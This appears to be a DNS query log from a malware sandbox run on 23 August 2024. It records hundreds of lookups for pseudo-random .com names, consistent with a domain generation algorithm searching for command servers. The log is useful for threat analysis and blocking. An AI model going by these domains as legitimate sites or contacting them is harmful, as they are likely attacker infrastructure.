Aug 23, 2024 18:43:29.970963001 CEST	192.168.2.5	1.1.1.1	0x3f28	Standard query (0)	puvywup.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.971203089 CEST	192.168.2.5	1.1.1.1	0xf80f	Standard query (0)	gahyfow.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.971683025 CEST	192.168.2.5	1.1.1.1	0x12d2	Standard query (0)	lyryxen.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.971832991 CEST	192.168.2.5	1.1.1.1	0x149	Standard query (0)	vocyquc.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.972281933 CEST	192.168.2.5	1.1.1.1	0xfff1	Standard query (0)	gacyqys.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.972419977 CEST	192.168.2.5	1.1.1.1	0x9a4d	Standard query (0)	puryxag.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.972610950 CEST	192.168.2.5	1.1.1.1	0x6018	Standard query (0)	qegyfil.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.972901106 CEST	192.168.2.5	1.1.1.1	0x8ab5	Standard query (0)	lygyfir.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.973193884 CEST	192.168.2.5	1.1.1.1	0xdeb1	Standard query (0)	vowyzam.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.973635912 CEST	192.168.2.5	1.1.1.1	0xbb29	Standard query (0)	qexyqyv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.974412918 CEST	192.168.2.5	1.1.1.1	0xbf4f	Standard query (0)	pufydul.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.975055933 CEST	192.168.2.5	1.1.1.1	0x4d94	Standard query (0)	gaqyzoh.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.975358009 CEST	192.168.2.5	1.1.1.1	0xfaf	Standard query (0)	lyxymed.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.975528955 CEST	192.168.2.5	1.1.1.1	0xa4d8	Standard query (0)	vofydut.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.976353884 CEST	192.168.2.5	1.1.1.1	0xa9fc	Standard query (0)	qeqyloq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.976423025 CEST	192.168.2.5	1.1.1.1	0xa2df	Standard query (0)	gadyduz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.976623058 CEST	192.168.2.5	1.1.1.1	0x8e69	Standard query (0)	lymylij.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.976938963 CEST	192.168.2.5	1.1.1.1	0x6f7d	Standard query (0)	puzymev.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.977338076 CEST	192.168.2.5	1.1.1.1	0x63ae	Standard query (0)	pumytol.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.977770090 CEST	192.168.2.5	1.1.1.1	0x6d02	Standard query (0)	lysyvud.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.492937088 CEST	192.168.2.5	1.1.1.1	0xe0a9	Standard query (0)	volymaf.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.495229006 CEST	192.168.2.5	1.1.1.1	0xa51c	Standard query (0)	qedysyp.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.495771885 CEST	192.168.2.5	1.1.1.1	0xb47a	Standard query (0)	pumyliq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.496277094 CEST	192.168.2.5	1.1.1.1	0x7c7e	Standard query (0)	galynab.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.496740103 CEST	192.168.2.5	1.1.1.1	0xf3de	Standard query (0)	lysysyx.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.497221947 CEST	192.168.2.5	1.1.1.1	0x944c	Standard query (0)	vonykuk.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.497673988 CEST	192.168.2.5	1.1.1.1	0x2bd2	Standard query (0)	qekynog.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.498161077 CEST	192.168.2.5	1.1.1.1	0x16dc	Standard query (0)	pupypep.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.498658895 CEST	192.168.2.5	1.1.1.1	0x1d29	Standard query (0)	ganykuw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.499108076 CEST	192.168.2.5	1.1.1.1	0xfbea	Standard query (0)	lykynon.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.499557972 CEST	192.168.2.5	1.1.1.1	0x93dd	Standard query (0)	vopypec.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.500005007 CEST	192.168.2.5	1.1.1.1	0xb577	Standard query (0)	qebykul.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.500456095 CEST	192.168.2.5	1.1.1.1	0xa841	Standard query (0)	pujybig.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.500919104 CEST	192.168.2.5	1.1.1.1	0x4409	Standard query (0)	gatypas.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.501775026 CEST	192.168.2.5	1.1.1.1	0x8cc2	Standard query (0)	lyvyjyr.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.502320051 CEST	192.168.2.5	1.1.1.1	0x35d5	Standard query (0)	vojybim.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.502787113 CEST	192.168.2.5	1.1.1.1	0xa875	Standard query (0)	qetytav.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.503233910 CEST	192.168.2.5	1.1.1.1	0x7cc5	Standard query (0)	puvyjyl.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.503711939 CEST	192.168.2.5	1.1.1.1	0x56ca	Standard query (0)	gahyvuh.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.504188061 CEST	192.168.2.5	1.1.1.1	0x139f	Standard query (0)	lyrytod.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.504652023 CEST	192.168.2.5	1.1.1.1	0xd28c	Standard query (0)	vocyjet.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.505108118 CEST	192.168.2.5	1.1.1.1	0x3082	Standard query (0)	qegyvuq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.505575895 CEST	192.168.2.5	1.1.1.1	0x1470	Standard query (0)	purytov.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.506040096 CEST	192.168.2.5	1.1.1.1	0x3b30	Standard query (0)	gacyhez.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.506454945 CEST	192.168.2.5	1.1.1.1	0x255a	Standard query (0)	lygyvuj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.506864071 CEST	192.168.2.5	1.1.1.1	0x5c04	Standard query (0)	vowyrif.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.507309914 CEST	192.168.2.5	1.1.1.1	0xa4e8	Standard query (0)	qexyhap.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.507713079 CEST	192.168.2.5	1.1.1.1	0xf105	Standard query (0)	pufycyq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.508133888 CEST	192.168.2.5	1.1.1.1	0x3cf1	Standard query (0)	gaqyrib.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.508596897 CEST	192.168.2.5	1.1.1.1	0x496e	Standard query (0)	lyxygax.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.509042978 CEST	192.168.2.5	1.1.1.1	0x7b9a	Standard query (0)	vofycyk.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.509443998 CEST	192.168.2.5	1.1.1.1	0xa07d	Standard query (0)	qeqyrug.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.509989023 CEST	192.168.2.5	1.1.1.1	0x6bc7	Standard query (0)	puzygop.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.512787104 CEST	192.168.2.5	1.1.1.1	0xa693	Standard query (0)	volygoc.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.512934923 CEST	192.168.2.5	1.1.1.1	0xa4a1	Standard query (0)	gadycew.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.513096094 CEST	192.168.2.5	1.1.1.1	0x9553	Standard query (0)	qedyxel.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.513221025 CEST	192.168.2.5	1.1.1.1	0xa1bc	Standard query (0)	lymywun.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.513370037 CEST	192.168.2.5	1.1.1.1	0xb6eb	Standard query (0)	pumywug.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.513494968 CEST	192.168.2.5	1.1.1.1	0xe837	Standard query (0)	galyfis.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.513694048 CEST	192.168.2.5	1.1.1.1	0x469e	Standard query (0)	lysyxar.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.513875008 CEST	192.168.2.5	1.1.1.1	0xef60	Standard query (0)	vonyqym.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.513999939 CEST	192.168.2.5	1.1.1.1	0x71e6	Standard query (0)	qekyfiv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.514123917 CEST	192.168.2.5	1.1.1.1	0x2d62	Standard query (0)	pupyxal.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.514297962 CEST	192.168.2.5	1.1.1.1	0x43f4	Standard query (0)	ganyqyh.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.514503956 CEST	192.168.2.5	1.1.1.1	0x583e	Standard query (0)	vopyzot.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.514801979 CEST	192.168.2.5	1.1.1.1	0x808	Standard query (0)	qebyqeq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.514955044 CEST	192.168.2.5	1.1.1.1	0x21e4	Standard query (0)	pujyduv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.515146017 CEST	192.168.2.5	1.1.1.1	0x6636	Standard query (0)	gatyzoz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.515320063 CEST	192.168.2.5	1.1.1.1	0x9764	Standard query (0)	lyvymej.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.515552044 CEST	192.168.2.5	1.1.1.1	0x1209	Standard query (0)	vojyduf.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.515763998 CEST	192.168.2.5	1.1.1.1	0x2cef	Standard query (0)	qetylip.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.515902996 CEST	192.168.2.5	1.1.1.1	0xbc19	Standard query (0)	puvymaq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.516071081 CEST	192.168.2.5	1.1.1.1	0x828f	Standard query (0)	gahydyb.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.516210079 CEST	192.168.2.5	1.1.1.1	0xab48	Standard query (0)	lyrylix.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.516381025 CEST	192.168.2.5	1.1.1.1	0x7879	Standard query (0)	vocymak.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.516549110 CEST	192.168.2.5	1.1.1.1	0x9309	Standard query (0)	qegysyg.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.516752005 CEST	192.168.2.5	1.1.1.1	0xbdad	Standard query (0)	purylup.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.516990900 CEST	192.168.2.5	1.1.1.1	0xf1ff	Standard query (0)	gacynow.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.517180920 CEST	192.168.2.5	1.1.1.1	0x5171	Standard query (0)	vowykuc.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.517338037 CEST	192.168.2.5	1.1.1.1	0xb6b7	Standard query (0)	lygysen.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.517498970 CEST	192.168.2.5	1.1.1.1	0xee4b	Standard query (0)	qexynol.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.517882109 CEST	192.168.2.5	1.1.1.1	0x760a	Standard query (0)	pufypeg.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.518014908 CEST	192.168.2.5	1.1.1.1	0xefe6	Standard query (0)	gaqykus.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.518532038 CEST	192.168.2.5	1.1.1.1	0xf17b	Standard query (0)	lykyfud.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.711484909 CEST	192.168.2.5	1.1.1.1	0xfa45	Standard query (0)	lygyvuj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.679991961 CEST	192.168.2.5	1.1.1.1	0xd83c	Standard query (0)	lyxynir.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.680751085 CEST	192.168.2.5	1.1.1.1	0x3531	Standard query (0)	vofypam.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.681339025 CEST	192.168.2.5	1.1.1.1	0xfa0	Standard query (0)	qeqykyv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.682058096 CEST	192.168.2.5	1.1.1.1	0xe799	Standard query (0)	puzybil.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.682503939 CEST	192.168.2.5	1.1.1.1	0xd3f8	Standard query (0)	gadypah.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.682938099 CEST	192.168.2.5	1.1.1.1	0xf43b	Standard query (0)	lymyjyd.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.682993889 CEST	192.168.2.5	1.1.1.1	0xeac7	Standard query (0)	volybut.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.683610916 CEST	192.168.2.5	1.1.1.1	0xc93f	Standard query (0)	qedytoq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.683705091 CEST	192.168.2.5	1.1.1.1	0x9aca	Standard query (0)	pumyjev.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.684309006 CEST	192.168.2.5	1.1.1.1	0x844b	Standard query (0)	lysytoj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.684461117 CEST	192.168.2.5	1.1.1.1	0x6b3d	Standard query (0)	galyvuz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.684902906 CEST	192.168.2.5	1.1.1.1	0xe654	Standard query (0)	vonyjef.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.685527086 CEST	192.168.2.5	1.1.1.1	0x9552	Standard query (0)	qekyvup.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.685627937 CEST	192.168.2.5	1.1.1.1	0xd0a9	Standard query (0)	ganyhab.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.686170101 CEST	192.168.2.5	1.1.1.1	0x7e85	Standard query (0)	lykyvyx.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.686283112 CEST	192.168.2.5	1.1.1.1	0x80f6	Standard query (0)	vopyrik.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.686814070 CEST	192.168.2.5	1.1.1.1	0x21a8	Standard query (0)	pujycyp.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.686836004 CEST	192.168.2.5	1.1.1.1	0xe444	Standard query (0)	qebyhag.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.687550068 CEST	192.168.2.5	1.1.1.1	0x5254	Standard query (0)	lyvygon.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.687911034 CEST	192.168.2.5	1.1.1.1	0x67f3	Standard query (0)	vojycec.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.688050985 CEST	192.168.2.5	1.1.1.1	0x38f6	Standard query (0)	puvygog.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.688137054 CEST	192.168.2.5	1.1.1.1	0xcb0e	Standard query (0)	qetyrul.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.688617945 CEST	192.168.2.5	1.1.1.1	0x856d	Standard query (0)	gahyces.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.688617945 CEST	192.168.2.5	1.1.1.1	0xc117	Standard query (0)	gatyruw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.689603090 CEST	192.168.2.5	1.1.1.1	0xccd7	Standard query (0)	lyrywur.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.690041065 CEST	192.168.2.5	1.1.1.1	0x1dff	Standard query (0)	vocygim.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.690345049 CEST	192.168.2.5	1.1.1.1	0xc713	Standard query (0)	qegyxav.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.690520048 CEST	192.168.2.5	1.1.1.1	0xf783	Standard query (0)	purywyl.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.690836906 CEST	192.168.2.5	1.1.1.1	0x88a1	Standard query (0)	gacyfih.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.691298962 CEST	192.168.2.5	1.1.1.1	0xcd0f	Standard query (0)	lygyxad.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.691337109 CEST	192.168.2.5	1.1.1.1	0xc2f3	Standard query (0)	vowyqyt.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.692030907 CEST	192.168.2.5	1.1.1.1	0xa04	Standard query (0)	qexyfuq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.692415953 CEST	192.168.2.5	1.1.1.1	0xc2df	Standard query (0)	pufyxov.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.692589998 CEST	192.168.2.5	1.1.1.1	0x344f	Standard query (0)	gaqyqez.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.694312096 CEST	192.168.2.5	1.1.1.1	0x87d	Standard query (0)	vofyzof.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.695337057 CEST	192.168.2.5	1.1.1.1	0xb1e1	Standard query (0)	pupytiq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.695367098 CEST	192.168.2.5	1.1.1.1	0x3f6e	Standard query (0)	qeqyqep.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.695540905 CEST	192.168.2.5	1.1.1.1	0xcb48	Standard query (0)	puzyduq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.695682049 CEST	192.168.2.5	1.1.1.1	0x82be	Standard query (0)	gadyzib.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.695817947 CEST	192.168.2.5	1.1.1.1	0x7248	Standard query (0)	lymymax.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.696069956 CEST	192.168.2.5	1.1.1.1	0x7b37	Standard query (0)	volydyk.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.696324110 CEST	192.168.2.5	1.1.1.1	0x6f52	Standard query (0)	lyxyfuj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.696417093 CEST	192.168.2.5	1.1.1.1	0xbb8e	Standard query (0)	qedylig.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.696490049 CEST	192.168.2.5	1.1.1.1	0xc486	Standard query (0)	pumymap.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.696755886 CEST	192.168.2.5	1.1.1.1	0x23ca	Standard query (0)	lysylun.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.696877003 CEST	192.168.2.5	1.1.1.1	0x2d82	Standard query (0)	galydyw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.697077036 CEST	192.168.2.5	1.1.1.1	0xc532	Standard query (0)	vonymoc.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.697370052 CEST	192.168.2.5	1.1.1.1	0x8928	Standard query (0)	pupylug.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.697479010 CEST	192.168.2.5	1.1.1.1	0xf176	Standard query (0)	ganynos.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.697679043 CEST	192.168.2.5	1.1.1.1	0x48f3	Standard query (0)	vopykum.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.697767973 CEST	192.168.2.5	1.1.1.1	0x86dc	Standard query (0)	lykyser.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.698301077 CEST	192.168.2.5	1.1.1.1	0x9df9	Standard query (0)	qebyniv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.698410988 CEST	192.168.2.5	1.1.1.1	0xb744	Standard query (0)	pujypal.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.698630095 CEST	192.168.2.5	1.1.1.1	0x52f1	Standard query (0)	gatykyh.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.698630095 CEST	192.168.2.5	1.1.1.1	0xb863	Standard query (0)	lyvynid.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.699058056 CEST	192.168.2.5	1.1.1.1	0xde5e	Standard query (0)	vojypat.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.699450970 CEST	192.168.2.5	1.1.1.1	0xb523	Standard query (0)	puvybuv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.699603081 CEST	192.168.2.5	1.1.1.1	0xc895	Standard query (0)	qetykyq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.699703932 CEST	192.168.2.5	1.1.1.1	0xaaaa	Standard query (0)	gahypoz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.699858904 CEST	192.168.2.5	1.1.1.1	0xc25a	Standard query (0)	lyryjej.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.700340033 CEST	192.168.2.5	1.1.1.1	0x40ec	Standard query (0)	vocybuf.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.700459003 CEST	192.168.2.5	1.1.1.1	0x8ee5	Standard query (0)	qegytop.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.700601101 CEST	192.168.2.5	1.1.1.1	0xc3aa	Standard query (0)	puryjeq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.700740099 CEST	192.168.2.5	1.1.1.1	0x2e06	Standard query (0)	qekysel.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.737185001 CEST	192.168.2.5	1.1.1.1	0x3824	Standard query (0)	gacyvub.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.737660885 CEST	192.168.2.5	1.1.1.1	0x9735	Standard query (0)	lygytix.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.738310099 CEST	192.168.2.5	1.1.1.1	0x7d85	Standard query (0)	vowyjak.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.738792896 CEST	192.168.2.5	1.1.1.1	0x2710	Standard query (0)	qexyvyg.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.739624977 CEST	192.168.2.5	1.1.1.1	0x1791	Standard query (0)	pufytip.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.739706039 CEST	192.168.2.5	1.1.1.1	0xa486	Standard query (0)	gaqyhaw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.740171909 CEST	192.168.2.5	1.1.1.1	0xe17a	Standard query (0)	lyxyvyn.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.740550995 CEST	192.168.2.5	1.1.1.1	0x356f	Standard query (0)	vofyruc.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.740788937 CEST	192.168.2.5	1.1.1.1	0x2be9	Standard query (0)	qeqyhol.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.741283894 CEST	192.168.2.5	1.1.1.1	0x43a0	Standard query (0)	gadyrus.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.741383076 CEST	192.168.2.5	1.1.1.1	0x1a74	Standard query (0)	lymygor.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.741780996 CEST	192.168.2.5	1.1.1.1	0x674f	Standard query (0)	qedyruv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.741795063 CEST	192.168.2.5	1.1.1.1	0xd2c2	Standard query (0)	volycem.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.742338896 CEST	192.168.2.5	1.1.1.1	0xdef1	Standard query (0)	galycah.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.742463112 CEST	192.168.2.5	1.1.1.1	0x688f	Standard query (0)	pumygil.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.742809057 CEST	192.168.2.5	1.1.1.1	0x4851	Standard query (0)	lysywyd.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.743287086 CEST	192.168.2.5	1.1.1.1	0xedcd	Standard query (0)	vonygit.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.743443012 CEST	192.168.2.5	1.1.1.1	0x248e	Standard query (0)	qekyxaq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.743890047 CEST	192.168.2.5	1.1.1.1	0xf753	Standard query (0)	pupywyv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.744118929 CEST	192.168.2.5	1.1.1.1	0x7bf4	Standard query (0)	ganyfuz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.744333982 CEST	192.168.2.5	1.1.1.1	0xbc80	Standard query (0)	lykyxoj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.744853973 CEST	192.168.2.5	1.1.1.1	0xfbac	Standard query (0)	qebyfup.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.744986057 CEST	192.168.2.5	1.1.1.1	0xfbee	Standard query (0)	vopyqef.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.745281935 CEST	192.168.2.5	1.1.1.1	0x7e07	Standard query (0)	pujyxoq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.745364904 CEST	192.168.2.5	1.1.1.1	0x6311	Standard query (0)	gatyqeb.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.745768070 CEST	192.168.2.5	1.1.1.1	0x74fe	Standard query (0)	lyvyfux.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.745929003 CEST	192.168.2.5	1.1.1.1	0xd226	Standard query (0)	vojyzik.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.746356010 CEST	192.168.2.5	1.1.1.1	0xd09e	Standard query (0)	qetyqag.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.746689081 CEST	192.168.2.5	1.1.1.1	0xa35e	Standard query (0)	puvydyp.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.747015953 CEST	192.168.2.5	1.1.1.1	0x4f18	Standard query (0)	gahyziw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.747072935 CEST	192.168.2.5	1.1.1.1	0x2045	Standard query (0)	lyryman.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.747711897 CEST	192.168.2.5	1.1.1.1	0xb7d8	Standard query (0)	vocydyc.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.747754097 CEST	192.168.2.5	1.1.1.1	0x65d7	Standard query (0)	qegylul.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.748317003 CEST	192.168.2.5	1.1.1.1	0xa22	Standard query (0)	purymog.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.748437881 CEST	192.168.2.5	1.1.1.1	0x8721	Standard query (0)	gacydes.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.748948097 CEST	192.168.2.5	1.1.1.1	0x343d	Standard query (0)	lygylur.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.749381065 CEST	192.168.2.5	1.1.1.1	0x1ebf	Standard query (0)	qexysev.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.749428988 CEST	192.168.2.5	1.1.1.1	0x28fc	Standard query (0)	pufylul.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.750080109 CEST	192.168.2.5	1.1.1.1	0x540b	Standard query (0)	gaqynih.com	A (IP address)	IN (0x0001)	false
